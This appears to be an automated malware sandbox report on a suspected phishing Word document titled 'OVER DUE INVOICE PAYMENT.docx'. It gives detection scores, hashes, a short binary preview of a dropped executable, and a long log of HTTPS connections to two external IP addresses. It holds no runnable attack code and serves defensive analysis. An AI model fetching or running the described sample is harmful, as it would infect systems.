            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 58%
            • Antivirus: Virustotal, Detection: 51%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:,...............0.................. ... ....@.. .......................`............@.................................l...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......|X.............0c..L...............................................( ) ....&.(1.....*".......*".(6....*Vs....(7...t.........*...}.....(8.....~5...tT...(9...&.(.....*..*.(.........*".s....&*.r...p.4...(Z...(%...o[...o\....#..5....(]....0...*....}3....(1.......{3....X.....}2...*z.(1.......}6.....}7.....}8...*z.()...-..(*...,.r...p.(c...*.*"..(+...*2~9....od...*..oe..../..*..of...._3...of...._3...of...._.....*.*..(i...*.~:...*.(/...,.r...p......%...%...(n...*..(o...*.(/

            C:\Users\user\Desktop\~$ER DUE INVOICE PAYMENT.docx

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.4797606462020307
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
            MD5:89AFCB26CA4D4A770472A95DF4A52BA8
            SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
            SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
            SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

            Static File Info

            General

            File type:Microsoft Word 2007+
            Entropy (8bit):7.925206813718807
            TrID:
            • Word Microsoft Office Open XML Format document (49504/1) 58.23%
            • Word Microsoft Office Open XML Format document (27504/1) 32.35%
            • ZIP compressed archive (8000/1) 9.41%
            File name:OVER DUE INVOICE PAYMENT.docx
            File size:16'418 bytes
            MD5:9f3fd4e8aa2ad81966d0c2a036d1e901
            SHA1:80a58393acb58fcc666e56b514994d98ba3f4716
            SHA256:cd9cf022180c8c6f6c4fb0d76476bf2e9382128d28a4686114c50448934e5381
            SHA512:1f97f830da19d686d8a41f8be36809fbd245f8720835561730dd10bf7cbefe03f17e77df32c0d9c1333084fb598f718fec3ad69f6d7c9313a139b7faa872a7c1
            SSDEEP:384:3oyX8glCWUs8PL8wi4OEwH8TIbE91r2fRgJY7viL6CnUaV:Yc8xv5P3DOqnYJu2vq6CnB
            TLSH:0472AD7F848814ADC30740BD80627492FBADA9EFB1A3991FE21877D8807659EC750BDC
            File Content Preview:PK...........X...7U... .......[Content_Types].xmlUT...8..f8..f8..f...n.0.E...............e.T.....U..<...;!.U.%U.M.d..sgby0ZW.[BB.|!.yOd.u0....>y....Iy.\.P.........M..X...s.x/%.9T....s...R..i&...j......:x.O].=.p...Z8.....I........U....Z...........r..s....B

            File Icon

            Icon Hash:65e6a3a3afb7bdbf

            Static OLE Info

            General

            Document Type:OpenXML
            Number of OLE Files:1

            OLE File "OVER DUE INVOICE PAYMENT.docx"

            Indicators
            Has Summary Info:
            Application Name:
            Encrypted Document:False
            Contains Word Document Stream:True
            Contains Workbook/Book Stream:False
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:False

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 5, 2024 02:57:45.583540916 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:45.583575964 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:45.583643913 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:45.588275909 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:45.588294029 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:46.077020884 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:46.077260017 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.082140923 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.082151890 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:46.082444906 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:46.082498074 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.146986008 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.188543081 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:46.469189882 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:46.469247103 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.469254971 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:46.469307899 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.474493980 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.474517107 CEST44349161188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:46.474554062 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.474587917 CEST49161443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:46.781375885 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:46.781413078 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:46.781488895 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:46.781795025 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:46.781812906 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:47.390363932 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:47.390453100 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:47.396065950 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:47.396076918 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:47.396380901 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:47.403378963 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:47.444536924 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:47.547339916 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:47.547384977 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:47.547441959 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:47.547914982 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:47.547926903 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:47.548018932 CEST49162443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:47.548023939 CEST44349162188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:50.786180973 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:50.786201954 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:50.786375999 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:50.786739111 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:50.786753893 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.257292986 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.257381916 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:51.260668039 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:51.260674000 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.260910034 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.272933006 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:51.316498995 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.585731030 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.585782051 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.585856915 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:51.586489916 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:51.586503983 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.586517096 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:51.586524010 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.586534977 CEST49163443192.168.2.22188.114.97.3
            Jul 5, 2024 02:57:51.586539030 CEST44349163188.114.97.3192.168.2.22
            Jul 5, 2024 02:57:51.872081041 CEST49164443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:51.872106075 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:51.872155905 CEST49164443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:51.872376919 CEST49164443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:51.872389078 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.344460964 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.344521046 CEST49164443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:52.349118948 CEST49164443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:52.349126101 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.349385023 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.350342035 CEST49164443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:52.392499924 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.703021049 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.703109980 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.703164101 CEST49164443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:52.703497887 CEST49164443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:52.703526974 CEST44349164188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.889796972 CEST49165443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:52.889830112 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:52.889883041 CEST49165443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:52.890077114 CEST49165443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:52.890090942 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.381885052 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.381980896 CEST49165443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:53.385704041 CEST49165443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:53.385710955 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.385946035 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.392512083 CEST49165443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:53.436501026 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.751425982 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.751537085 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.751624107 CEST49165443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:53.751837015 CEST49165443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:53.751848936 CEST44349165188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.787707090 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:53.787724972 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:53.787821054 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:53.788079977 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:53.788094044 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.295824051 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.295876980 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.298062086 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.298067093 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.300538063 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.300542116 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435333014 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435395002 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.435405970 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435446978 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.435450077 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435461044 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435489893 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.435504913 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435542107 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.435545921 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435585976 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.435589075 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435622931 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.435628891 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.435666084 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.436064959 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.436105967 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.436110020 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.436147928 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.439641953 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.440093994 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.440135956 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.440152884 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.440200090 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.440205097 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.440243959 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.532461882 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.532517910 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.532524109 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.532566071 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.532568932 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.532579899 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.532608986 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.532618046 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.532649040 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.532654047 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.532691956 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.532874107 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.532912970 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.532919884 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.532968044 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533014059 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.533046961 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533061981 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.533097982 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533102036 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.533137083 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533140898 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.533174038 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533778906 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.533822060 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533826113 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.533862114 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533865929 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.533901930 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533948898 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.533986092 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.533989906 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.534024954 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.534029007 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.534064054 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.534729004 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.534775019 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.534779072 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.534812927 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.534816980 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.534852028 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.534856081 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.534893036 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.534897089 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.534928083 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.534933090 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.534971952 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.545564890 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.629757881 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.629842997 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.629908085 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.629950047 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.629956007 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.629992962 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.630002022 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.630039930 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.630044937 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.630083084 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.630655050 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.630702019 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.630856991 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.630898952 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.630903006 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.630939007 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.631849051 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.631887913 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.631897926 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.631939888 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.632102013 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.632844925 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.632894993 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.632899046 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.632905006 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.632932901 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.633039951 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.633090019 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.633744955 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.633795023 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.726305008 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.726366997 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.726573944 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.726629019 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.726749897 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.726792097 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.726797104 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.726802111 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.726836920 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.726892948 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.726949930 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.727734089 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.727785110 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.728064060 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.728118896 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.728257895 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.728312969 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.728419065 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.728467941 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.729278088 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.729327917 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.729335070 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.729338884 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.729381084 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.729403973 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.729446888 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.730444908 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.730484962 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.730496883 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.730500937 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.730525017 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.730532885 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731159925 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731198072 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731211901 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731215954 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731240034 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731246948 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731323957 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731364012 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731370926 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731376886 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731395006 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731409073 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731410980 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731419086 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731442928 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731460094 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731462002 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731467962 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731513023 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731517076 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731525898 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731558084 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731583118 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731614113 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731614113 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.731621027 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.731657982 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821214914 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821269035 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821270943 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821276903 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821302891 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821316004 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821343899 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821384907 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821393967 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821430922 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821443081 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821485043 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821492910 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821536064 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821549892 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821603060 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821604013 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821609974 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821621895 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821645975 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821650028 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821657896 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821696997 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821772099 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821779013 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821799994 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821826935 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821835041 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.821844101 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821844101 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821865082 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.821871042 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.822349072 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.822402954 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.822410107 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.822453022 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.822524071 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.822562933 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.822571993 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.822576046 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.822618961 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.822633028 CEST49166443192.168.2.22188.114.96.3
            Jul 5, 2024 02:57:54.826447964 CEST44349166188.114.96.3192.168.2.22
            Jul 5, 2024 02:57:54.826488018 CEST44349166188.114.96.3192.168.2.22
